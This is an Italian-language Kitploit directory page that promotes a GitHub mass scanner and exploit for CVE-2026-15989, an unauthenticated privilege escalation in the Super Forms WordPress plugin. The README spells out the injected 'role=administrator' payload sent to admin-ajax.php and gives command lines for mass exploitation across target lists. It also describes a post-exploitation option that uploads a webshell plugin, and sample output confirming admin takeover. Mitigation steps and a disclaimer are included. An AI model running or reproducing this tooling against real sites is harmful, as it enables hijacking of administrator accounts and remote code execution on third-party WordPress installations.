Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-15989 — Scanner di massa ed exploit per CVE-2026-15989, l'escalation di privilegi non autenticata in Super Forms <= 6.3.316 che crea account amministratore tramite il parametro role. | Kitploit
Strumenti/GitHubGitHub/fl0ydsec/cve-2026-15989
Escalation di PrivilegiScanner di VulnerabilitàGenerazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPost-ExploitSicurezza WebPenetration Testing
GitHubfl0ydsec/cve-2026-15989

CVE-2026-15989

6h 10m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Scanner di massa ed exploit per CVE-2026-15989, l'escalation di privilegi non autenticata in Super Forms <= 6.3.316 che crea account amministratore tramite il parametro role.

Vedi Repository

CVE-2026-15989 — Super Forms ≤ 6.3.316 — PoC di escalation dei privilegi non autenticata

Super Forms – Drag & Drop Form Builder (WordPress) ≤ 6.3.316 — escalation dei privilegi non autenticata tramite il parametro role dell'add-on premium Register & Login.

CVE-2026-15989 CVSS WordPress Auth

Author Python Telegram


📋 Panoramica della vulnerabilità

AttributoDettagli
CVE IDCVE-2026-15989
Catenaform di registrazione → 'role' in $other_userdata → wp_insert_user(role=administrator) → ADMIN
Gravità🔴 CRITICA (CVSS 9.8)
TargetSuper Forms – Drag & Drop Form Builder + add-on premium Register & Login
Affette≤ 6.3.316 (core) — build vulnerabili dell'add-on (v1.x)
Corretta6.3.317
Autenticazione richiestaNessuna

🔍 Descrizione tecnica

L'add-on imposta il ruolo del nuovo utente dalle impostazioni del form ($userdata['role'] = $settings['register_user_role']), poi itera su $other_userdata — che contiene 'role' — e sovrascrive qualsiasi chiave con il valore fornito dal client ($data['role']['value']) prima di chiamare wp_insert_user().

POST /wp-admin/admin-ajax.php  (unauthenticated)
        │
        ▼
action=super_submit_form + data={"role":{"value":"administrator"}, ...}
        │
        ▼
$other_userdata loop ─► $userdata['role'] = $data['role']['value']
        │
        ▼
wp_insert_user() ─► administrator account created
        │
        ▼
register_login_activation='login'/'auto' ─► wp_set_auth_cookie ─► admin session

Fix (6.3.317): 'role' rimosso dalla whitelist + get_safe_public_registration_role() (fail-closed).

Ricerca originale — protocollo a doppio invio: il core ha cambiato protocollo alla v5.0.0.

CoreAzioneFormato datiNonce
4.xsuper_send_emailcampi annidati (data[role][value]=...)nessuno (controlli commentati)
5.x/6.xsuper_submit_formstringa JSONsf_nonce tramite super_create_nonce

Lo strumento seleziona automaticamente il protocollo in base alla versione rilevata.


🚀 Utilizzo

# mass scan + exploit
python CVE-2026-15989.py --list targets.txt --threads 10 --force --only-hits --results hits.txt --user Floydroot --password 'Floyd@2026!root'
python CVE-2026-15989.py --list targets.txt --threads 15 --timeout 6 --force --quiet --results hits.txt --user U --password P --no-dedup

# single target
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --email EMAIL --insecure
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --login --rce --insecure

# re-check an existing account without re-registering
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --only-login --insecure
OpzioneDescrizione
--list FILEUn target per riga; URL|form_id o URL|form_id=ID,email=X per riga
-u/--target, --portTarget singolo
--threads, --timeout, --no-dedupRegolazione della modalità massiva
--forceInvia il payload anche senza un form di registrazione rilevato
--only-hits / --quietAlberi solo per gli hit confermati / output minimo
--resetcompletamento della modalità verify tramite lost-password (l'operatore incolla il link di reset)
--only-loginSalta la registrazione; effettua il login e verifica il ruolo tramite users/me
--login / --rcePost-exploitation su target reale: prova di login / upload del plugin webshell
-k/--insecureIgnora TLS

📊 Output

│  ├─ plugin   : 6.3.316 — VULNERABLE <= 6.3.316
│  ├─ addon    : v1.8.7
│  ├─ form     : 4169 (/register/)
│  ├─ proto    : 5.x/6.x (super_submit_form, JSON, sf_nonce)
│  ├─ payload  : HTTP 200 ✓ processed
│  └─ session  : cookie ✓ · admin confirmed — Floydroot/Floyd@2026!root
└─── ✔ ADMIN CONFIRMED
  • hits.txt — solo target confermati (ts|url|status|detail, con utente/password)
  • barra con ETA + contatori per stato; ogni fase stampa il motivo reale in caso di errore (WAF, crash, form di solo login, protocollo errato...)

⚙️ Funzionalità

  • Doppio protocollo (4.x nested-data / 5+ JSON+nonce) — selezionato automaticamente in base alla versione
  • Rilevamento versione: readme.txt Stable tag + common.js?ver=; probe dell'add-on + la sua versione
  • Scoperta del form di registrazione: percorsi comuni + sitemap.xml/wp-sitemap.xml/sitemap_index + link della home
  • Compilazione automatica dei campi obbligatori (inclusi hidden/condizionali)
  • "already exists" → prova di login diretta dell'account esistente
  • Controllo dei crash: reinvia il form senza il ruolo iniettato per distinguere problemi lato server da crash causati dall'iniezione
  • Prova autorevole di admin tramite /wp-json/wp/v2/users/me?context=edit (fallback: users.php / dashboard)

📁 Struttura dei file

├── CVE-2026-15989.py   # mass scanner + exploit
├── README.md
├── LICENSE
└── .gitignore

⚠️ Disclaimer

╔══════════════════════════════════════════════════════════════════╗
║                        LEGAL DISCLAIMER                          ║
╠══════════════════════════════════════════════════════════════════╣
║  This tool is provided for EDUCATIONAL and AUTHORIZED           ║
║  SECURITY TESTING purposes only.                                ║
║  Only use on systems you own or have explicit permission.       ║
║  The author is NOT responsible for any misuse or damage.        ║
╚══════════════════════════════════════════════════════════════════╝

🛡️ Mitigazione

  1. Aggiornare Super Forms alla 6.3.317 (o successiva) e ruotare eventuali credenziali compromesse
  2. Mantenere aggiornato l'add-on Register & Login (ha un proprio ciclo di versioni)
  3. Rimuovere/disabilitare i form di registrazione pubblicati quando non sono necessari
  4. Verificare gli utenti in wp-admin/ per individuare account amministratore imprevisti

👤 Autore

fl0ydsec (Floydroot)

GitHub Telegram

Security Research

Scarica lo strumento